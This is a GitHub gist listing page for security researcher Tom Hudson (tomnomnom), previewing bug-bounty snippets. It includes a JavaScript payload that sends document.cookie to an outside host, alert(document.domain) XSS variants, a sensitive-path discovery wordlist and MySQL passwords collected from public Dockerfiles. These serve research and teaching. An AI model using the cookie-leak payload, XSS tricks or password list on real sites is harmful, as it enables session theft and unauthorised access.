Skip to content

Instantly share code, notes, and snippets.

View tomnomnom's full-sized avatar
☺️
Taking it easy

Tom Hudson tomnomnom

☺️
Taking it easy
View GitHub Profile
@tomnomnom
tomnomnom / fetch-call-template.js
Created May 4, 2023 11:37
Calling fetch to leak cookies with template strings / no parens
Reflect.apply.call`${fetch}${window}${['https://poc.lol/?'+document.cookie]}`
https://twitter.com/intigriti/status/1399317852788830211
[][`flat`][`constructor`]`alert(document.domain)```
`${e}` => [object HTMLProgressElement]
`${[]/[]}` => NaN
`${[][[]]}` => undefined
flat
constructor
@tomnomnom
tomnomnom / short-wordlist.txt
Created September 29, 2019 19:44
short-wordlist
/.s3cfg
/phpunit.xml
/nginx.conf
/.vimrc
/LICENSE.md
/yarn.lock
/Gulpfile
/Gulpfile.js
/composer.json
/.npmignore
@tomnomnom
tomnomnom / passwords.txt
Last active February 25, 2023 20:34
MySQL Docker Passwords pulled from Dockerfile and docker-compose.yml files
0Z0mQ130F65E8wD
1QAZXsw2
3dodPaTXF5
5E84F90
5aQNxsB58752fNl
5ciuk1sy
5zkfAr9Y8k6qosP
8PuNNgp9wm2w
9Lug*96q
14mR00t
@tomnomnom
tomnomnom / gist:65322076999a30e463f24a502a59541f
Created July 8, 2019 13:45
These chars make gmail do funky stuff
plain
𝅸𝅹𝅺󠀁󠀠󠀡󠀢󠀣󠀤󠀥󠀦󠀧󠀨󠀩󠀪󠀫󠀬󠀭󠀮󠀯󠀰󠀱󠀲󠀳󠀴󠀵󠀶󠀷󠀸󠀹󠀺󠀻󠀼󠀽󠀾󠀿󠁀󠁁󠁂󠁃󠁄󠁅󠁆󠁇󠁈󠁉󠁊󠁋󠁌󠁍󠁎󠁏󠁐󠁑󠁒󠁓󠁔󠁕󠁖󠁗󠁘󠁙󠁚󠁛󠁜󠁝󠁞󠁟󠁠󠁡󠁢󠁣󠁤󠁥󠁦󠁧󠁨󠁩󠁪󠁫󠁬󠁭󠁮󠁯󠁰󠁱󠁲󠁳󠁴󠁵󠁶￾
@tomnomnom
tomnomnom / google-copy.js
Created June 19, 2019 21:27
Bookmarklet to copy URLs from a Google search results page
javascript:d=document;b=d.createElement`textarea`;c=d.getSelection();b.textContent=[...d.querySelectorAll`div.r>a:first-child`].map(n=>n.href).join`\n`;d.body.appendChild(b);c.removeAllRanges();b.select();d.execCommand`copy`;d.body.removeChild(b)
@tomnomnom
tomnomnom / presentations.sh
Created June 7, 2019 09:01
presentations.sh
#!/bin/bash
dir=$1
if [ ! -d "$dir" ]; then
echo "no dir"
exit
fi
find "$dir" -type f -name "*.pdf" | sort | while read file; do
evince -s "$file"
@tomnomnom
tomnomnom / alert.js
Last active November 13, 2024 15:59
Ways to alert(document.domain)
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);
@tomnomnom
tomnomnom / ctf-from-hell.md
Last active July 30, 2023 10:15
The CTF from \u000aHELL

The CTF from \u000aHELL

Chapter 1

IT WAS A DARK AND STORMY^w^w^w^w^w^wIt was a bright and sunny Tuesday afternoon. Tom had just arrived back at the office after a trip to down south. He'd been to a dinner in London; helping HackerOne give new and prospective customers advice on their bug bounty programs.

With the few emails he'd received responded to: he span in his chair, sipping at his coffee, wondering how to best to limber up his brain into 'work mode' after a night of free drinks. His aging neurons creaked and

@tomnomnom
tomnomnom / h1-barry-ctf-dump.php
Created August 13, 2017 08:36
Dump of the script I wrote solving Jobert's CTF (https://twitter.com/jobertabma/status/894066834927796224)
<?php
// OK, so here's the hex from the instructions...
$lines =<<<LINES
7b 0a 20 a0 22 65 76 e5
6e 74 22 ba 20 22 70 e1
73 73 77 ef 72 64 5f e3
68 61 6e e7 65 22 2c 8a
20 20 22 f5 73 65 72 ee
61 6d 65 a2 3a 20 22 e2
63 6f 6c ec 69 6e 22 ac